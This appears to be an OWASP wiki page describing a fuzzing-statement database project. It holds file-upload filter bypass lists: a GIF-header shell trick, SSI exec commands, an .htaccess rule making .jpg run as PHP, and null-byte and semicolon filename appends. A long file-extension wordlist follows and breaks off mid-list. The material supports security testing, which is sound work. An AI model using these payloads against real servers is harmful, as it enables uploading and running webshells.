		<summary type="html">&lt;p&gt;Adam.muntner: /* Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htacces in an upload folder on Apache httpd, try setting .jpg to executable&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&lt;br /&gt;
# Commonly writable directories&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
